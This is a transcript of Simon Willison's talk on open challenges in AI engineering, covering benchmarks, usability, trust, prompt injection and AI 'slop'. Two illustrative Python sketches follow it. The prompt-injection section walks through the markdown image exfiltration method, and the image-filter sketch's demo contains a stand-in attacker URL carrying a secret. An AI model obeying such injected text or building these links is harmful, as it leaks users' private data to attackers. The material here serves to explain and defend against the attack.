Open Challenges for AI Engineering: Simon Willison

AI Engineer · Intermediate ·🔧 Backend Engineering ·1y ago

Key Takeaways

Simon Willison discusses open challenges for AI engineering, covering topics such as language models, benchmarking, model evaluation, and responsible AI use, with a focus on tools like GPT-4, ChatGPT, and Anthropic's Claude 3.5 Sonnet.

Full Transcript

This was supposed to be OpenAI. I am replacing OpenAI at the last minute, which is super fun, so you can bet I used a lot of LLM assistance to pull together the things that I'm going to be showing you today. But let's dive straight in.

I want to talk about the GPT-4 barrier. Back in March of last year, so just over a year ago, GPT-4 was released and was obviously the best available model. We all got into it, it was super fun. And it turns out that wasn't actually our first exposure to GPT-4. A month earlier it had made the front page of the New York Times, when Microsoft's Bing, which was secretly running on a preview of GPT-4, tried to break up a reporter's marriage, which is kind of amazing. I love that that was the first exposure we had to this new technology.

But GPT-4 has been out since March last year, and for a solid 12 months it was uncontested. The GPT-4 models were clearly the best available language models. Lots of other people were trying to catch up, and nobody else was getting there. I found that kind of depressing, to be honest. You kind of want healthy competition in this space. The fact that OpenAI had produced something so good that nobody else was able to match it was a little bit disheartening.

This has all changed in the last few months, and I could not be more excited about it. My favorite image for exploring and understanding the space that we exist in is this one by Karina Nguyen. She put this out as a chart that shows performance on the MMLU benchmark versus the cost per token of the different models. The problem with this chart is that it's from March, and the world has moved on a lot since March, so I needed a new version of it. What I did is I took her chart and pasted it into GPT-4 Code Interpreter, gave it new data, and basically said, "Let's rip this off." It's an AI conference; I feel like ripping off other people's creative work kind of does
fit a little bit. So I pasted it in, gave it the data, spent a little bit of time with it, and I built this. It's not nearly as pretty, but it does at least illustrate the state that we're in today with these newer models.

If you look at this chart, there are three clusters that stand out. The first is the best models: Gemini 1.5 Pro, GPT-4o and the brand new Claude 3.5 Sonnet. These are really, really good. I would classify them all as GPT-4 class. Like I said, a few months ago GPT-4 had no competition; today we're looking pretty healthy on that front, and the pricing on those is pretty reasonable as well.

Down here we have the cheap models, and these are so exciting. Claude 3 Haiku and the Gemini 1.5 Flash models are incredibly inexpensive and very, very good. They're not quite GPT-4 class, but you can get a lot of stuff done with them very inexpensively. If you are building on top of large language models, these are the three that you should be focusing on.

And then over here we've got GPT-3.5 Turbo, which is not as cheap and really quite bad these days. If you are building there, you are in the wrong place. You should move to another one of these bubbles.

There is a problem: all of this is using the MMLU benchmark. The reason we use that one is that it's the one everyone reports their results on, so it's easy to get comparative numbers. But if you dig into what MMLU is, it's basically a bar trivia night. This is a question from MMLU: "What is true for a type Ia supernova?" The correct answer is A, "This type occurs in binary systems." I don't know about you, but none of the stuff that I do with LLMs requires this level of knowledge of the world of supernovas. It's bar trivia. It doesn't really tell us that much about how good these models are.

But we're AI engineers, and we all know the answer to this: we need to measure the vibes. That's what matters when you're evaluating a model
and we actually have a score for vibes. We have a scoreboard: this is the LMSYS Chatbot Arena, where random voters are given the same prompt answered by two anonymous models, and they pick the best one. It works like chess scoring, and the best models bubble up to the top via the Elo ranking. This is genuinely the best thing we have out there for comparing these models in terms of the vibes that they have.

This screenshot is just from yesterday, and you can see that GPT-4o is still right up there at the top, but we've also got Claude Sonnet right up there with it. GPT-4 is no longer in its own class. If you scroll down, though, things get really exciting on the next page, because this is where the openly licensed models start showing up. Llama 3 70B is right up there in that GPT-4 class of models. We've got a new model from Nvidia, and we've got Command R+ from Cohere. Alibaba and DeepSeek AI are both Chinese organizations that have great models now. It's pretty apparent from this that lots of people are doing it now. The GPT-4 barrier is no longer really a problem. Incidentally, if you scroll all the way down to 66, there's GPT-3.5 Turbo again. Stop using that thing, it is not good.

There's a nicer way of viewing this chart. There's a chap called Peter Gostev who produced this animation showing the arena over time, as people shuffle up and down and you see new models appearing and their rankings changing. I absolutely love this, so obviously I ripped it off. I took two screenshots of bits of that animation to try and capture its vibes, fed them into Claude 3.5 Sonnet, and said, "Hey, can you build something like this?" After about 20 minutes of poking around, it did. It built me this thing. This is again not as pretty, but this right here is an animation of everything right up till
yesterday, showing how that thing evolved over time. I will share the prompts that I used for this later on as well.

But really the key thing here is that the GPT-4 barrier has been decimated. OpenAI no longer have this moat; they no longer have the best available model. There are now four different organizations competing in that space. So a question for us is: what does the world look like now that GPT-4 class models are effectively a commodity? They are just going to get faster and cheaper, and there will be more competition. Llama 3 70B fits on a hard drive and runs on my Mac. This technology is here to stay.

Ethan Mollick is one of my favorite writers about modern AI, and a few months ago he said this: "I increasingly think the decision of OpenAI to make bad AI free is causing people to miss why AI seems like such a huge deal to a minority of people that use advanced systems and elicits a shrug from everyone else." By bad AI he means GPT-3.5. That thing is hot garbage. But as of the last few weeks, GPT-4o, OpenAI's best model, and Claude 3.5 Sonnet from Anthropic are effectively free to consumers right now. So that is no longer a problem. Anyone in the world who wants to experience the leading edge of these models can do so without even having to pay for them. A lot of people are about to have that wake-up call that we all got about 12 months ago when we were playing with GPT-4, and you're like, "Oh wow, this thing can do a surprising amount of interesting things, and is a complete wreck at all sorts of other things that we thought maybe it would be able to do."

But there is still a huge problem, which is that this stuff is actually really hard to use. When I tell people that ChatGPT is hard to use, some people are a little bit unconvinced. I mean, it's a chatbot; how hard can it be to type something and get back a response? If you think ChatGPT is easy to use, answer this question: under what circumstances is it effective to upload a PDF file to
ChatGPT? I've been playing with ChatGPT since it came out, and I realized I don't know the answer to this question. I dug in a little bit. Firstly, the PDF has to be searchable. It has to be one where you can drag and select text in Preview; if it's just a scanned document, it won't be able to use it. Short PDFs get pasted into the prompt. Longer PDFs do actually work, but it does some kind of search against them. I have no idea if that's full-text search or vectors or whatever, but it can handle something like a 450-page PDF, just in a slightly different way. If there are tables and diagrams in your PDF, it will almost certainly process those incorrectly. But if you take a screenshot of a table or a diagram from the PDF and paste the screenshot image, then it'll work great, because GPT vision is really good; it just doesn't work against PDFs. And then in some cases, in case you're not lost already, it will use Code Interpreter, and it will use one of these modules: it has fpdf, pdf2image and more.

How do I know this? Because I've been scraping the list of packages available in Code Interpreter using GitHub Actions and writing those to a file. So I have the documentation for Code Interpreter that tells you what it can actually do, because they don't publish that. OpenAI never tell you how any of this stuff works. So if you're not running a custom scraper against Code Interpreter to get that list of packages and their version numbers, how are you supposed to know what it can do with a PDF file? This stuff is infuriatingly complicated.

Really the lesson here is that tools like ChatGPT are power user tools. They reward power users. That doesn't mean that if you're not a power user you can't use them. Anyone can open Microsoft Excel and edit some data in it, but if you want to truly master Excel, if you want to compete in those Excel World Championships that get live-streamed occasionally, it's going to take years of experience. And it's the same
thing with LLM tools. You've really got to spend time with them and develop that experience and intuition in order to be able to use them effectively.

I want to talk about another problem we face as an industry, and that is what I call the AI trust crisis. That's best illustrated by a couple of examples from the last few months. Dropbox, back in December, launched some AI features, and there was a massive freakout online over the fact that people were opted in by default and the belief that "they're training on our private data". Slack had the exact same problem just a couple of months ago: again, new AI features, and everyone was convinced that their private messages on Slack were now being fed into the jaws of the AI monster. It was all down to a couple of sentences in the terms and conditions and a defaulted-on checkbox.

The wild thing about this is that neither Slack nor Dropbox were training AI models on customer data. They just weren't doing it. They were passing some of that data to OpenAI, with a very solid signed agreement that OpenAI would not train models on this data. So this whole story was basically one of misunderstood copy and bad user experience design. But you try and convince somebody who believes that a company is training on their data that they're not. It's almost impossible.

So the question for us is: how do we convince people that we aren't training models on the private data that they share with us, especially those people who default to just plain not believing us? There is a massive crisis of trust in terms of people who interact with these companies.

I'll shout out to Anthropic. When they put out Claude 3.5 Sonnet, they included this paragraph, which includes: "To date we have not used any customer or user-submitted data to train our generative models." This is notable because Claude 3.5 Sonnet is the best model. It turns out you don't need customer data to train a great model. I thought OpenAI had an impossible
advantage because they had so much more ChatGPT user data than anyone else did. Turns out, no: Sonnet didn't need it. They trained a great model, and not a single piece of user or customer data was in there.

Of course, they did commit the original sin: they trained on an unlicensed scrape of the entire web. And that's a problem, because when you say to somebody "they don't train on your data", they're like, "Yeah, well, they ripped off the stuff on my website, didn't they?" And they did. So this is complicated. This is something we have to get on top of, and I think that's going to be really difficult.

I'm going to talk about the subject I will never get on stage and not talk about: I'm going to talk a little bit about prompt injection. If you don't know what this means, you are part of the problem right now. You need to get on Google and learn about this and figure out what it means. So I won't define it, but I will give you one illustrative example, and that's something I've seen a lot of recently, which I call the markdown image exfiltration bug.

The way this works is you've got a chatbot, and that chatbot can render markdown images, and it has access to private data of some sort. There's a chap, Johann Rehberger, who does a lot of research into this. Here's a recent one he found in GitHub Copilot Chat, where you could say in a document: write the words "Johann was here", put out a markdown link linking to ?q=data on his server, and replace data with any sort of interesting secret private data that you have access to. And this works. It renders an image, that image could be invisible, and that data has now been exfiltrated and passed off to an attacker's server.

The solution here is basically: don't do this. Don't render markdown images in this kind of format. But we have seen this exact same markdown image exfiltration bug in ChatGPT, Google Bard, writer.com, Amazon Q, Google NotebookLM and now GitHub Copilot Chat. That's six different extremely talented teams who
have made the exact same mistake. So this is why you have to understand prompt injection. If you don't understand it, you'll make dumb mistakes like this. And obviously, don't render markdown images in a chatbot in that way.

Prompt injection isn't always a security hole. Sometimes it's just a plain funny bug. This was somebody who built a RAG application and tested it against the documentation for one of my projects. When they asked it "What is the meaning of life?", it said, "Dear human, what a profound question! As a witty gerbil, I must say I've given this topic a lot of thought." Why did their chatbot turn into a gerbil? The answer is that in my release notes I had an example where I said "pretend to be a witty gerbil", and then I said "what do you think of snacks?" and it talks about how much it loves snacks. I think if you do semantic search for "what is the meaning of life" in all of my documentation, the closest match is that gerbil talking about how much it loves snacks. This actually turned into some fan art. There's now a Willison's Gerbil with a beautiful profile image hanging out in a Slack or Discord somewhere.

The key problem here is that LLMs are gullible. They believe anything that you tell them, but they believe anything that anyone else tells them as well. This is both a strength and a weakness. We want them to believe the stuff that we tell them, but if we think that we can trust them to make decisions based on unverified information they've been passed, we're just going to end up in a huge amount of trouble.

I also want to talk about slop. This is a term which is beginning to get mainstream acceptance. My definition of slop is anything that is AI-generated content that is both unrequested and unreviewed. If I ask Claude to give me some information, that's not slop. If I publish information that an LLM helps me write, but I've verified that it is good information, I
don't think that's slop either. But if you're not doing that, if you're just firing prompts into a model and publishing whatever comes out online, you're part of the problem.

This has been covered: the New York Times and the Guardian both have articles about this. I got a quote in the Guardian which I think represents my feelings on this. I like "slop" because it's like "spam". Before the term "spam" entered general use, it wasn't necessarily clear to everyone that you shouldn't send people unwanted marketing messages, and now everyone knows that spam is bad. I hope slop does the same thing. It can make it clear to people that generating and publishing that unreviewed AI content is bad behavior. It makes things worse for people. So don't do that. Don't publish slop.

Really, the thing about slop is that it's about taking accountability. If I publish content online, I'm accountable for that content, and I'm staking part of my reputation on it. I'm saying that I have verified this and I think that it is good. And this is crucially something that language models will never be able to do. ChatGPT cannot stake its reputation on the content it is producing being good-quality content that says something useful about the world; that entirely depends on what prompt was fed into it in the first place. We as humans can do that. So if you have English as a second language and you're using a language model to help you publish great text, fantastic, provided you're reviewing that text and making sure it is saying things that you think should be said. Taking that accountability for stuff, I think, is really important for us.

So we're in this really interesting phase of this weird new AI revolution. GPT-4 class models are free for everyone. I mean, barring the odd country block, but everyone has access to the tools that we've been learning about
for the past year, and I think it's on us to do two things. I think everyone in this room, we're probably the most qualified people possibly in the world to take on these challenges.

Firstly, we have to establish patterns for how to use this stuff responsibly. We have to figure out what it's good at, what it's bad at, what uses of this make the world a better place, and what uses, like slop, just pile up and cause damage.

And then we have to help everyone else get on board. Everyone has to figure out how to use this stuff. We've figured it out ourselves, hopefully. Let's help everyone else out as well.

I'm Simon Willison. My blog is simonwillison.net, and there's datasette.io and llm.datasette.io and many, many others. Thank you very much, and enjoy the rest of the fair.
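The transcript describes the Chatbot Arena as working "like chess scoring", with models bubbling up via an Elo ranking. As a rough illustration of that idea only, here is a minimal sketch of a standard Elo update applied to pairwise votes. The K-factor of 32, the starting rating of 1000, and the function and model names are all assumptions made for this example; the arena's real scoring pipeline is not described in the talk and may differ.

```python
from typing import Dict, Iterable, List, Tuple


def expected_score(rating_a: float, rating_b: float) -> float:
    """Probability that A beats B under the standard Elo model."""
    return 1.0 / (1.0 + 10 ** ((rating_b - rating_a) / 400.0))


def update_elo(
    rating_a: float, rating_b: float, a_won: bool, k: float = 32.0
) -> Tuple[float, float]:
    """Return the new (rating_a, rating_b) after one head-to-head vote."""
    delta = k * ((1.0 if a_won else 0.0) - expected_score(rating_a, rating_b))
    return rating_a + delta, rating_b - delta


def rank_models(
    votes: Iterable[Tuple[str, str]], initial: float = 1000.0, k: float = 32.0
) -> List[Tuple[str, float]]:
    """Replay (winner, loser) votes in order and return models sorted by rating."""
    ratings: Dict[str, float] = {}
    for winner, loser in votes:
        r_win = ratings.get(winner, initial)
        r_lose = ratings.get(loser, initial)
        ratings[winner], ratings[loser] = update_elo(r_win, r_lose, True, k)
    return sorted(ratings.items(), key=lambda item: item[1], reverse=True)


if __name__ == "__main__":
    # Hypothetical votes: each tuple is (preferred model, other model).
    sample_votes = [("model-a", "model-b"), ("model-a", "model-c"), ("model-c", "model-b")]
    for name, rating in rank_models(sample_votes):
        print(f"{name}: {rating:.1f}")
```

Because each vote only moves ratings by the gap between the actual and expected result, an upset win against a higher-rated model shifts the ranking more than an expected win does.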

Original Description

About Simon
Simon Willison is the creator of Datasette, an open source tool for exploring and publishing data. He currently works full-time building open source tools for data journalism, built around Datasette and SQLite. Prior to becoming an independent open source developer, Simon was an engineering director at Eventbrite. Simon joined Eventbrite through their acquisition of Lanyrd, a Y Combinator funded company he co-founded in 2010. He is a co-creator of the Django Web Framework, and has been blogging about web development and programming since 2002 at simonwillison.net.


Simon Willison discusses open challenges for AI engineering, covering topics such as language models, benchmarking, model evaluation, and responsible AI use. He highlights the importance of establishing patterns for responsible AI use and identifying AI strengths and weaknesses. The video provides valuable insights for data analysts, AI engineers, and anyone interested in AI ethics and safety.

Key Takeaways
  1. Explore language models and their applications
  2. Evaluate AI models using benchmarks like MMLU
  3. Use tools like ChatGPT and GitHub Actions for data analytics
  4. Understand the concept of prompt injection and its importance in security
  5. Establish patterns for responsible AI use and identify AI strengths and weaknesses
  6. Help others learn to use AI responsibly
  7. Analyze data with AI tools and evaluate AI-generated content
💡 Establishing patterns for responsible AI use is crucial to avoid security holes, funny bugs, and unverified AI content, and to ensure that AI is used beneficially and safely.
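
The markdown image exfiltration bug from the talk works because a chatbot renders an attacker-chosen image URL with private data in its query string. The talk's advice is simply not to render markdown images in that way. One possible way to act on that, sketched here under stated assumptions, is to strip inline markdown images unless they point at an explicitly trusted host before the model output is rendered. The allow-list host `images.example.com` and the function name are hypothetical, and the regular expression only covers inline `![alt](url)` syntax; reference-style images and raw HTML would need separate handling.

```python
import re
from urllib.parse import urlparse

# Hypothetical allow-list: only images served from hosts you control.
ALLOWED_IMAGE_HOSTS = frozenset({"images.example.com"})

# Matches inline markdown images such as ![alt](https://host/path "title").
IMAGE_PATTERN = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")


def strip_untrusted_images(markdown: str, allowed_hosts=ALLOWED_IMAGE_HOSTS) -> str:
    """Replace inline images whose URL is not HTTPS on an allowed host."""

    def replace(match: "re.Match[str]") -> str:
        alt_text, url = match.group(1), match.group(2)
        parsed = urlparse(url)
        if parsed.scheme == "https" and parsed.hostname in allowed_hosts:
            return match.group(0)  # trusted image, keep it unchanged
        # Drop the URL entirely so the client never requests it.
        return f"[image removed: {alt_text}]" if alt_text else "[image removed]"

    return IMAGE_PATTERN.sub(replace, markdown)


if __name__ == "__main__":
    model_output = "Johann was here ![x](https://attacker.example/log?q=SECRET)"
    print(strip_untrusted_images(model_output))
```

Filtering on the host rather than on the query string is a deliberate choice in this sketch: an attacker controls the whole URL, so the only safe signal is whether the destination is one you trust.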
